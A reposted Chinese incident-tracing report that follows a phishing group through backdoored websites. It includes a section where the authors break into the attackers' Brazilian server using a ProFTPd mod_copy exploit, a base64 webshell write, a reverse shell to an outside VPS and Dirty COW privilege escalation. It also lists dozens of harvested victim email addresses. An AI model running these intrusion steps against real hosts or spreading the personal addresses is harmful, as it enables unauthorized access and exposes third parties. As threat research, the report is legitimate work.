日志路徑: /home2/helionco/access-logs/helioncomposites.com/日志備份: ls /home2/helionco/logs/ ftp.helioncomposites.com-ftp_log-Feb-2018.gz helioncomposites.com-Dec-2018.gz helioncomposites.com-Nov-2018.gz helioncomposites.com-ssl_log-Dec-2018.gz helioncomposites.com-ssl_log-Nov-2018.gz tar zcvf /home2/helionco/www/helioncomposites.com-www.tar.gz --exclude=/home2/helionco/www/helioncomposites.com-www.tar.gz /home2/helionco/www/tar zcvf /home2/helionco/www/helioncomposites.com-log.tar.gz /home2/helionco/logs/ /home2/helionco/access-logs/helioncomposites.com/

下載

wget http://helioncomposites.com/helioncomposites.com-log.tar.gz wget http://helioncomposites.com/helioncomposites.com-www.tar.gz

分析

根據后門文件名，匹配Apache訪問日志，到攻擊者代理IP和User Agent。? root@kali  /tmp  grep ".php" * |grep "/home2/helionco/public_html/" |grep "HTTP\/1.1\" 200" |awk -F ":" '{print $2}' |awk '{a[$1]+=1;} END {for(i in a){print a[i]" "i;}}' |sort -t " " -k 1 -n -r >ip.txt1137 198.143.51.17 588 198.143.38.3 478 198.143.41.14 246 198.143.32.13 131 198.143.32.3 103 198.143.57.3 86 198.143.57.73 84 198.143.57.5 46 198.143.32.10 32 198.143.37.15 ......? root@kali  /tmp  for line in $(</ip.txt); do curl https://ip.cn/\?ip\=$line ; doneIP: 198.143.51.17 來自: 以色列 Incapsula IP: 198.143.38.3 來自: 美國 Incapsula IP: 198.143.41.14 來自: 美國 Incapsula IP: 198.143.32.13 來自: 美國 Incapsula IP: 198.143.32.3 來自: 美國 Incapsula IP: 198.143.57.3 來自: 美國 Incapsula IP: 198.143.57.73 來自: 美國 Incapsula IP: 198.143.57.5 來自: 美國 Incapsula IP: 198.143.32.10 來自: 美國 Incapsula ......

這個網站由于日志不全，提取出的IP大都是爬蟲IP，所以不納入最終的匯總。

4.5.3 發現釣魚程序

網站　zebramedia.al　上發現多個攻擊者放置的釣魚程序和模板。

針對Dropbox

針對Gmail

4.6 關聯分析

使用之前得到的后門文件中的關鍵字（config.php）對這3個網站文件進行匹配，發現其中2個存在相同后門文件，并且文件MD5值相同。

? root@kali  /tmp  find . -name "*.php" |xargs grep "\$bm_____s" |awk -F ":" '{print $1}' ./rosturplast.com/www/rosturplast.com/shells/config.php ./mirohaviar.sk/www/config.php ./zebramedia.al/www/zebramedia.al/config.php ./www.radiolanalhue.cl/www/public_html/online/administrator/templates/bluestork/config.php

后門文件MD5

? root@kali  /tmp  find . -name "*.php" |xargs grep "\$bm_____s" |awk -F ":" '{print $1}' |xargs md5sume5c06f1f66781ba5c39d909096c4cd47 ./rosturplast.com/www/rosturplast.com/shells/config.php e5c06f1f66781ba5c39d909096c4cd47 ./mirohaviar.sk/www/config.php e5c06f1f66781ba5c39d909096c4cd47 ./zebramedia.al/www/zebramedia.al/config.php e5c06f1f66781ba5c39d909096c4cd47 ./www.radiolanalhue.cl/www/public_html/online/administrator/templates/bluestork/config.php

五、滲透攻擊者肉雞服務器

5.1 漏洞掃描

目標：187.85.134.4

[+] HOST: 187.85.134.4（巴西）
[+] OS: Ubuntu
[+] Web Server: Apache/2.2.22 / PHP/5.3.10-1ubuntu3.19
[+] CMS: 未知

nmap --script=firewalk --traceroute 187.85.134.4

5.２ 漏洞利用

端口掃描發現目標 FTP Server為ProFTPd 1.3.4a，這個版本和1.3.5存在未授權文件復制漏洞，我們可以通過這個漏洞往Web目錄寫入一個WebShell。

ProFTPd 1.3.5 Remote Command Execution（CVE-2015-3306） ProFTPD中使用的mod_copy模塊存在未授權訪問風險，導致ProFTPD自帶的命令 SITE CPFR 和 SITE CPTO可在未登錄ftp的情況被外部黑客所利用，對系統文件進行任意復制。

5.２ 獲取權限

使用用MSF執行

得到一個cmd功能的WebShell

寫入中國菜刀客戶端

http://187.85.134.4/lndex.php?img=echo PD9waHAgQGV2YWwoJF9QT1NUWydhJ10pOz8+Cg== |base64 -d >/var/www/index2.php

5.3 文件分析

在Web目錄下面發現用于發送釣魚郵件的perl腳本、郵件釣魚樣本和大量的郵箱地址。以及挖礦后門、DDOS腳本等。

5.3.1 釣魚模板

圖示是針對丹麥丹斯克銀行（Danske Bank）和希臘阿爾法銀行（Alpha Bank）的郵件釣魚樣本。

5.3.2 僵尸網絡程序

5.3.3 DDoS腳本

5.3.4 郵箱地址

統計目錄下的 txt 文本數量，發現共有六十二萬四千個郵箱地址。

? root@kali  /tmp/187.85.134.4/www/cat  wc -l *.txt 624000 總用量

主流郵箱檢索

? root@kali  /tmp/187.85.134.4/www/cacat  grep "@gmail.com" *.txt |head -n 20 a0000001.txt:a.l.v.e.rtadsmileyksso@gmail.com a0000001.txt:a.l.v.ertadsmileyksso@gmail.com a0000001.txt:a.lfer.gm@gmail.com a0000001.txt:a.lieseijsink@gmail.com a0000001.txt:a.linkhusen@gmail.com a0000001.txt:a.loldrup@gmail.com a0000001.txt:a.lovendahl@gmail.com a0000001.txt:a.lv.e.rtadsmileyksso@gmail.com a0000001.txt:a.lver.tadsmileyksso@gmail.com a0000001.txt:a.m.edsberg@gmail.com a0000001.txt:a.m.morcke@gmail.com a0000001.txt:a.m.quist@gmail.com a0000001.txt:a.m.svendsen@gmail.com a0000001.txt:a.merete.p@gmail.com a0000001.txt:a.mette.sm@gmail.com a0000001.txt:a.miller8111@gmail.com a0000001.txt:a.moejbaek@gmail.com a0000001.txt:a.moltkehansen@gmail.com a0000001.txt:a.munktved@gmail.com a0000001.txt:a.n.knutzen@gmail.com? root@kali  /tmp/187.85.134.4/www/cat  grep "@outlook.com" *.txt |head -n 20a0000001.txt:a.m.westra@outlook.com a0000001.txt:a.olsen@outlook.com a0000002.txt:aagren@outlook.com a0000003.txt:aandanimalcity@outlook.com a0000003.txt:aarhus-ungegruppe@outlook.com a0000004.txt:aase.lousdal@outlook.com a0000006.txt:abroschultz@outlook.com a0000008.txt:adamfred2@outlook.com a0000008.txt:adexecsolution@outlook.com a0000010.txt:adrian.f.a.svendsen@outlook.com a0000015.txt:aiah@outlook.com a0000015.txt:aimeegarcia584@outlook.com a0000016.txt:ajolicoeu@outlook.com a0000018.txt:akstrup@outlook.com a0000020.txt:alexander_bangsborg@outlook.com a0000020.txt:alexanderkopke@outlook.com a0000020.txt:ali__sivan@outlook.com a0000021.txt:alicegerner@outlook.com a0000022.txt:allanjeppesen@outlook.com a0000023.txt:allworlduseu@outlook.com? root@kali  /tmp/187.85.134.4/www/cat  grep "@163.com" *.txt |head -n 20a0000001.txt:a31a18615@163.com a0000001.txt:a398c671@163.com a0000059.txt:backlink0321@163.com a0000061.txt:banqianm8256@163.com a0000075.txt:bf86ad32@163.com a0000121.txt:cbb146672@163.com a0000129.txt:chenbin800519@163.com a0000134.txt:chuofuh3082@163.com a0000157.txt:davidhuang001@163.com a0000162.txt:dfjiuew@163.com a0000209.txt:f08dbf326@163.com a0000213.txt:fanxued79193@163.com a0000221.txt:fjfzpy@163.com a0000227.txt:fon@163.com a0000259.txt:guangdk@163.com a0000311.txt:huhuanqiang00161@163.com

5.4 提權

5.4.1 CVE-2013-2094，CVE-2013-1763提權

查看apache日志目錄，發現沒有權限。

[/var/www/]$ls -al /var/log/apache2/ ls: cannot open directory /var/log/apache2/: Permission denied

內核版本為3.5.0-23，嘗試提權。

[/var/www/]$cat /etc/issue Ubuntu 12.04.2 LTS \n \l[/var/www/]$uname -an Linux medidor2 3.5.0-23-generic #35~precise1-Ubuntu SMP Fri Jan 25 17:15:33 UTC 2013 GNU/Linux

WebShell反彈： [/var/www/]$cd /var/tmp;./pty xxx.xxx.xxx.xxx 443外網VPS監聽： socat file:`tty`,echo=0,raw tcp-listen:443

實際測試CVE-2013-2094，CVE-2013-1763均無法提權。

CVE-2013-2094 Linux Kernel 3.2.0-23/3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Local Privilege Escalation (3)CVE-2013-1763 Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation

5.4.2 臟牛提權

祭出大殺器CVE-2016-5195（臟牛） ， 理論上通殺 2.6.22 < 3.9 (x86/x64)的內核版本。

在本地環境提權測試過程中發現，i386架構下使用cowroot提權時EXP會破壞源文件，導致提權失敗。而使用dirtycow-mem僅修改內存則沒有問題，但是存在內核崩潰的風險。這兩個EXP都是利用/proc/self/mem提權，前一個修改文件，后一個修改內存。

如圖所示：

使用dirtycow-mem.c提權時需要注意：i386架構下編譯前需要將源代碼中libc路徑修改為目標系統libc路徑，否則執行時找不到文件。

#define SHELLCODE "\x31\xc0\xc3" #define SPACE_SIZE 256 #define LIBC_PATH "/lib/x86_64-linux-gnu/libc.so.6" ## 改為　/lib/i386-linux-gnu/libc.so.6 #define LOOP 0x1000000#ifndef PAGE_SIZE #define PAGE_SIZE 4096

Give me root 　:），提權成功。

www-data@medidor2:/tmp$gcc -Wall -o hello dirtycow-mem.c -ldl -lpthread www-data@medidor2:/tmp$ ls hello www-data@medidor2:/tmp$ chmod +x hello www-data@medidor2:/tmp$ id uid=33(www-data) gid=33(www-data) groups=33(www-data) www-data@medidor2:/tmp$ ./hello [*] range: b7573000-b7716000] [*] getuid = b762bd10 [*] mmap 0xb73cb000 [*] exploiting (patch) [*] patched (madviseThread) [*] patched (procselfmemThread) root@medidor2:/tmp# [*] exploiting (unpatch) [*] unpatched: uid=33 (madviseThread) [*] unpatched: uid=33 (procselfmemThread)root@medidor2:/tmp# id uid=0(root) gid=0(root) groups=0(root)

打包Apache日志。

? ? root@kali  ls /var/log/apache2 access error other_vhosts_access.log? ? root@kali  tar zcvf /var/www/apache2-log.tar.gz /var/log/apache2/ ? ? root@kali  /tmp  ltor wget http://187.85.134.4/apache2-log.tar.gz [proxychains] config file found: /data/app/local/proxychains_local_tor/proxychains.conf [proxychains] preloading /data/app/local/proxychains_local_tor/libproxychains4.so [proxychains] DLL init --2011-11-11 11:11:11-- http://187.85.134.4/apache2-log.tar.gz 正在連接 187.85.134.4:80... [proxychains] Strict chain ... 127.0.0.1:9050 ... 187.85.134.4:80 ... OK 已連接。 已發出 HTTP 請求，正在等待回應... 200 OK 長度：9258688 (8.8M) [application/x-gzip] 正在保存至: “apache2-log.tar.gz”apache2-log.tar.gz 100%[===================>] 8.83M 29.6KB/s 用時 5m 45s 2018-11-11 11:11:11 (26.2 KB/s) - 已保存 “apache2-log.tar.gz” [9258688/9258688])

5.5 分析日志

分析IP訪問情況

? root@kali  /tmp/  grep "/cacat/" * |grep "php" | awk -F ":" '{print $2}' |awk '{a[$1]+=1;} END {for(i in a){print a[i]" "i;}}' |sort -t " " -k 1 -n -r >ip.txt95 185.56.80.138 77 197.211.60.52 70 67.71.3.8 59 207.35.210.35 41 99.226.207.46 41 193.215.40.238 39 197.211.59.163 38 82.61.95.132 38 66.249.73.95 37 76.26.34.181 37 197.234.221.77 31 105.112.27.60 29 105.112.23.41 20 109.166.138.68 16 66.249.79.61 16 197.211.61.18 14 212.100.77.191 12 197.234.221.210 8 66.249.79.35 8 66.249.73.64 7 154.118.69.165 5 66.249.73.67......? root@kali  /tmp  for line in $(<ip.txt); do curl https://ip.cn/\?ip\=$line ; done IP: 185.56.80.138 來自: 荷蘭 IP: 197.211.60.52 來自: 尼日利亞 IP: 67.71.3.8 來自: 加拿大 IP: 207.35.210.35 來自: 加拿大 IP: 99.226.207.46 來自: 加拿大 IP: 193.215.40.238 來自: 挪威 IP: 197.211.59.163 來自: 尼日利亞 IP: 82.61.95.132 來自: 意大利 IP: 66.249.73.95 來自: Google 骨干網 IP: 76.26.34.181 來自: 美國 IP: 197.234.221.77 來自: 貝寧 IP: 105.112.27.60 來自: 尼日利亞 IP: 105.112.23.41 來自: 尼日利亞 IP: 109.166.138.68 來自: 羅馬尼亞 IP: 66.249.79.61 來自: Google 骨干網 IP: 197.211.61.18 來自: 尼日利亞 IP: 212.100.77.191 來自: 尼日利亞 IP: 197.234.221.210 來自: 貝寧 IP: 66.249.79.35 來自: Google 骨干網 IP: 66.249.73.64 來自: Google 骨干網 IP: 154.118.69.165 來自: 尼日利亞 IP: 66.249.73.67 來自: Google 骨干網 ......

根據路徑名判斷，疑似受害者訪問了釣魚頁面。

? root@kali  /tmp/ grep "/cacat" *| grep "php" |grep "POST" |awk -F ":" '{print $2 $6}' |sort |uniq 109.166.138.68 - - [31/Jan/2018//187.85.134.4/cacat/portal/portal/userlogin.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36" 109.166.138.68 - - [31/Jan/2018//187.85.134.4/cacat/portal/portal/userlogin.php?sfm_sid=120" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"185.56.80.138 - - [31/Jan/2018//187.85.134.4/cacat/portal/portal/userlogin.php?sfm_sid=8425" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36"196.52.34.20 - - [12/Oct/201835.0) Gecko/20100101 Firefox/35.0"207.35.210.35 - - [21/Aug/2018//187.85.134.4/cacat/win2018/winbnk/EBlogin.html?sitecode=GR&lang=el-GR" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"197.211.60.52 - - [07/Sep/2018:16:02:40 -0300] "GET /cacat/nnnnn.zip HTTP/1.1" 200 4489167 "http://187.85.134.4/cacat/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"

查看web目錄下txt文件訪問情況，總共有一萬多IP。訪問地址包含受害者主機IP、各種搜索引擎爬蟲IP、各路黑客的IP等等。

grep "/cacat/" * |grep "txt" | awk -F ":" '{print $2}' |awk '{a[$1]+=1;} END {for(i in a){print a[i]" "i;}}' |sort -t " " -k 1 -n -r >ip.txt? root@kali  ~/Desktop  wc -l ip.txt 10101 ip.txt

5.6 訪問IP熱力圖

5.6.1 IP轉經緯度坐標

將獲得的IP轉換成經緯度坐標，再通過百度地圖API生成熱力圖

將IP轉換成經緯度坐標，腳本：ip2xy.py 生成經緯度坐標文件：point.js 全球IP庫：GeoLiteCity.dat

#!/usr/bin/python #coding:utf-8 import pandas as pd import pygeoip import types import sysgi = pygeoip.GeoIP('/tmp/GeoLiteCity.dat', pygeoip.MEMORY_CACHE) def getLocal(ip):if type(ip) != types.StringType:print ipreturnlocation = gi.record_by_addr(ip)if location is None:print ipreturnlng = location['longitude']lat = location['latitude']str_temp = '{"lat":' + str(lat) + ',"lng":' + str(lng) + '},\n'print ip,lng,lat,str_tempfile.write(str_temp)file = open('/tmp/point.js', 'w') file.write("var points =[\n") with open("/tmp/ip.txt") as f:i = 0for ip in f.readlines():getLocal(ip)file.write("];\n") file.close()

5.6.2 調用百度地圖API

本地調用百度地圖 JavaScript API： map.html

<!DOCTYPE html> <html lang="en"> <head> <!DOCTYPE html> <html> <head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="initial-scale=1.0, user-scalable=no" /><script type="text/javascript" src="http://api.map.baidu.com/api?v=2.0&ak=填寫自己的百度AK"></script><script type="text/javascript" src="http://api.map.baidu.com/library/Heatmap/2.0/src/Heatmap_min.js"></script> <script type="text/javascript" src="./point.js"></script><title>熱力圖功能示例</title><style type="text/css">ul,li{list-style: none;margin:0;padding:0;float:left;}html{height:100%}body{height:100%;margin:0px;padding:0px;font-family:"微軟雅黑";}#container{height:100%;width:100%;}#r-result{width:100%;}</style> </head> <body><div id="container"></div><div id="r-result" style="display:none"><input type="button" onclick="openHeatmap();" value="顯示熱力圖"/><input type="button" onclick="closeHeatmap();" value="關閉熱力圖"/></div> </body> </html> <script type="text/javascript">var map = new BMap.Map("container"); // 創建地圖實例var point = new BMap.Point(34.0224714118,109.0786868715);map.centerAndZoom(point, 6); // 初始化地圖，設置中心點坐標和地圖級別map.setCurrentCity("西安"); //設置當前顯示城市map.enableScrollWheelZoom(); // 允許滾輪縮放if(!isSupportCanvas()){alert('熱力圖目前只支持有canvas支持的瀏覽器,您所使用的瀏覽器不能使用熱力圖功能~')}//詳細的參數,可以查看heatmap.js的文檔 https://github.com/pa7/heatmap.js/blob/master/README.md//參數說明如下:/* visible 熱力圖是否顯示,默認為true* opacity 熱力的透明度,1-100* radius 勢力圖的每個點的半徑大小* gradient {JSON} 熱力圖的漸變區間 . gradient如下所示* {.2:'rgb(0, 255, 255)',.5:'rgb(0, 110, 255)',.8:'rgb(100, 0, 255)'}其中 key 表示插值的位置, 0~1.value 為顏色值.*/heatmapOverlay = new BMapLib.HeatmapOverlay({"radius":100,"visible":true});map.addOverlay(heatmapOverlay);heatmapOverlay.setDataSet({data:points,max:100});//closeHeatmap();//判斷瀏覽區是否支持canvasfunction isSupportCanvas(){var elem = document.createElement('canvas');return !!(elem.getContext && elem.getContext('2d'));}function setGradient(){/*格式如下所示:{0:'rgb(102, 255, 0)',.5:'rgb(255, 170, 0)',1:'rgb(255, 0, 0)'}*/var gradient = {};var colors = document.querySelectorAll("input[type='color']");colors = [].slice.call(colors,0);colors.forEach(function(ele){gradient[ele.getAttribute("data-key")] = ele.value;});heatmapOverlay.setOptions({"gradient":gradient});}function openHeatmap(){heatmapOverlay.show();}function closeHeatmap(){heatmapOverlay.hide();} </script> </body> </html>

5.6.3 生成熱力圖

如圖所示，歐洲IP居多，亞洲也不少。至于有多少主機淪陷和多少受害者上鉤，無法準確判斷。

六、信息匯總

根據所得信息匯總，對這個黑客組織信息進行簡單分析，僅供參考。

6.1 組織信息

名稱： Muslim Cyber Corp - Mujahidin Cyber Army - Family Attack Cyber 地區： 巴勒斯坦 成員ID： Hawk_B404 、 MR.S1NS_Y 、 koneksi eror 、 GU3LT03M 、 SinonX 、 ./B4Z1R007 、 ./Bl4ckJ4ck 、 anon99husein 、 4GottenName 、Gantai 、 4nzeL4 、 AKEMI403 歷史郵箱： alexsin54@yahoo.com jasonchowan223@gmail.com macacperus@yopmail.com bidibidibidi@yopmail.com bidi.pici11@hotmail.com bidi.cuc@mail.com flrnvasilica@gmail.com 組織主頁： http://mujahidincyberarmy.blogspot.com/ https://www.facebook.com/FamilyAttackCyberOfficial/

6.2 攻擊手段

入侵使用Wordpress、Joomla! CMS的網站、放置釣魚程序，批量傳播釣魚郵件。 攻擊目標： 早期政治目的居多，主要攻擊美國政府機構網站和雇員。近期多為商業目的，主要針對歐洲銀行客戶以及亞洲金融機構雇員進行郵件釣魚。 控制主機： 187.85.134.4 常用后門： 略

6.3 攻擊歷史

美國聯邦調查局、美國國土安全部、美國司法部 巴勒斯坦黑客已經發布了大約2萬名聯邦調查局（FBI）和9,000名國土安全部（DHS）官員的個人信息 http://mujahidincyberarmy.blogspot.com/2016/12/inilah-data-informasi-pribadi-20-ribu.html 通過釣魚郵件獲得美國司法部權限 http://mujahidincyberarmy.blogspot.com/2016/02/hacker-pro-palestina-terbitkan.html

6.4 代理IP

174.85.145.99 (美國) - - [27/Nov/2018:23:35:31 +0300] "POST /shells/bacu.php HTTP/1.1" 200 4731 "http://www.rosturplast.com/shells/bacu.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"50.73.252.169 (美國) - - [29/Nov/2018//www.rosturplast.com/shells/config.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"213.233.104.120 (羅馬尼亞) - - [27/Nov/2018:22:10:03 +0300] "GET /shells/config.php HTTP/1.1" 200 124 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0"207.228.149.69 (百慕大 ) - - [28/Nov/2018:23:12:54 +0300] "POST /shells/config.php HTTP/1.1" 200 3729 "http://www.rosturplast.com/shells/config.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"195.211.23.207 (俄羅斯) - - [27/Nov/2018:22:36:50 +0300] "GET /shells/config.php HTTP/1.1" 200 124 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"29.205.113.8 (尼日利亞) - - [30/Nov/2018//www.rosturplast.com/shells/config.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36"212.1.211.3 （美國） - - [30/Nov/2018:13:35:36 -0300] "GET /online/templates/beez5/bc.php HTTP/1.1" 200 16823 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"178.128.221.199 （希臘）- - [29/Nov/2018//www.zebramedia.al/wp-content/themes/shells/INSTALL.sql.txt.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36"197.211.61.82 （尼日利亞) - - [29/Nov/2018//www.zebramedia.al/wp-content/themes/shells/INSTALL.sql.txt.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"

6.5 被黑網站

不完全統計rosturplast.com mirohaviar.sk helioncomposites.com radiolanalhue.cl zebramedia.al www.qtfontebispo.com www.seoeaze.com vilapoucadeaguiar.com proyectosphr.cl u-p.com www.humanaconsultores.cl amsogroup.com www.tdftechnologies.com www.bvvagos.pt www.huellasdigitales.cl lince.apsl.edu.pl www.fica.unsl.edu.ar proyectosphr.cl www.zlobek.uw.edu.pl ifr.pt mail.ijrer.org www.hkmms.org.hk historia.apsl.edu.pl www.homeguide.com.sg onlinecombos.co.in umo.apsl.edu.pl www.bpmp2t.lombokbaratkab.go.id amsogroup.com viper.cl www.teniscavancha.cl www.estacaomedica.pt terrarestobar.cl jf-bragado.pt helioncomposites.com notariabasualto.cl ericdiblasi.com reinamarltda.cl cobraz.pt www.stmarypellaia.com webcam.wm-itservice.at

七、攻擊路徑還原

復盤整個溯源過程，還原攻擊者攻擊路徑。

以上就是整個溯源過程，僅供參考。

---

本文由 Seebug Paper 發布，如需轉載請注明來源。

也歡迎訪問我們：知道創宇云安全

如果你想與我成為朋友，歡迎加微信kcsc818

總結

以上是生活随笔為你收集整理的如何通过一封恶意邮件追踪幕后黑客组织的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。